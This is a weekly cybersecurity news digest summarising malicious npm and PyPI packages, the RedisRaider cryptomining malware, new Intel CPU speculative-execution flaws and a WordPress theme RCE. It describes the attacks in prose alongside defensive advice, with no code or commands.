05/14/2025-05/21/2025 Malicious npm Package Leverages Unicode Steganography; New Go-Based Malware ‘RedisRaider’; New Intel CPU Flaws

1. Malicious npm Package Leverages Unicode Steganography, Google Calendar as C2 Dropper

Cybersecurity researchers have uncovered a malicious npm package called “os-info-checker-es6” that poses as an OS utility while stealthily delivering a second-stage payload. Disguised using Unicode-based steganography, the malware uses a Google Calendar event short link as a dropper to fetch the final payload, effectively hiding attacker infrastructure. Published on March 19, 2025, by a user named “kim9123”, the package has been downloaded over 2,000 times. A related package, “skip-tot”, and three others—“vue-dev-serverr”, “vue-dummyy”, and “vue-bit”—are also linked to the campaign. The malicious code appears in a later version uploaded on May 7, 2025, hidden in the “preinstall.js” script. Although no further payloads are currently being distributed, researchers believe the campaign may be dormant, targeted, or still evolving.

Experts warn that attackers increasingly exploit trusted services like Google Calendar, urging defenders to monitor behavioral signals and validate third-party packages closely.

2. New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency

Security experts have discovered RedisRaider, a new malware campaign that targets misconfigured Redis servers to mine Monero cryptocurrency. Written in Go and heavily obfuscated using Garble, RedisRaider is designed for stealth and evasive propagation.

The malware scans for Redis servers on port 6379, confirms they’re Linux-based, then exploits commands like SET, CONFIG, and BGSAVE to install a malicious cron job. This job downloads and runs the XMRig miner while erasing traces using short-lived keys, temporary cron files, and log deletion. RedisRaider’s infrastructure also hosts a web-based Monero miner, expanding its reach to website visitors. One server involved was linked to multiple services, suggesting broader exploitation. To defend against RedisRaider, experts recommend enabling protected mode, setting strong authentication, restricting access, and monitoring for unusual activity.

3. Researchers Expose New Intel CPU Flaws Enabling Memory Leaks and Spectre v2 Attacks

A new vulnerability, Branch Privilege Injection (BPI), affects all modern Intel CPUs. BPI allows attackers to exploit CPU prediction mechanisms to access sensitive data from other users on the same processor, reviving concerns around Spectre-style attacks.

The flaw, assigned CVE-2024-45332 (CVSS 5.7), leverages Branch Predictor Race Conditions (BPRC) to bypass privilege boundaries. Intel has issued microcode patches to mitigate the risk.

Meanwhile, researchers at Vrije Universiteit Amsterdam (VUSec) detailed new Spectre v2 variants, codenamed Training Solo, which leak kernel memory at speeds up to 17 Kb/s, completely bypassing domain isolation.

These include:

• CVE-2024-28956 (CVSS 5.7): Affects Intel Core 9th–11th Gen and Xeon 2nd–3rd Gen.
• CVE-2025-24495 (CVSS 6.8): Affects Intel CPUs with Lion Cove cores.
  Intel released patches, and AMD updated guidance to highlight risks from classic BPF use.

4. Malicious PyPI Packages Exploit Instagram and TikTok APIs to Validate User Accounts

Cybersecurity researchers have discovered several malicious Python packages on the PyPI repository that were designed to validate stolen email addresses against TikTok and Instagram APIs. The packages, named checker-SaGaF, steinlurks, and sinnercore, were used to check if an email address was associated with legitimate social media accounts.

The main package, checker-SaGaF, sent HTTP POST requests to TikTok’s password recovery API and Instagram’s account login endpoints to verify email validity. Interestingly, the malicious payload in these packages was similar to the one found in the previously detected “discordpydebug” package. Researchers also noted similarities to the techniques used by the hacktivist group Phoenix Hyena, although attribution remains tentative. All malicious packages have been removed from PyPI.

5. Malware Found in PyPI Packages Targeting Open-Source Developers

Security researchers have identified a new wave of malicious Python packages on the PyPI repository that specifically target open-source developers. These packages were designed to steal sensitive information and gain unauthorized access to developers’ systems. The malicious code was hidden within seemingly legitimate packages that were downloaded thousands of times before being detected.

The compromised packages included backdoors that allowed attackers to execute arbitrary commands on infected systems. They also attempted to steal authentication tokens and access keys stored on developers’ machines. Researchers recommend that developers immediately review their installed packages, verify package integrity, and ensure they are using trusted sources for their dependencies.

6. Remote Code Execution Vulnerability Found in ROME Theme Kit

A critical remote code execution (RCE) vulnerability has been discovered in the ROME Theme Kit, a popular WordPress theme framework. The flaw affects all versions of the theme and could allow attackers to execute arbitrary code on vulnerable websites. The vulnerability stems from insufficient input validation in certain theme functions.

Website administrators are strongly advised to update to the latest patched version of the theme immediately. In addition, it is recommended to review server access logs for any suspicious activity and consider implementing additional security measures such as web application firewalls and regular security scans to prevent potential exploitation.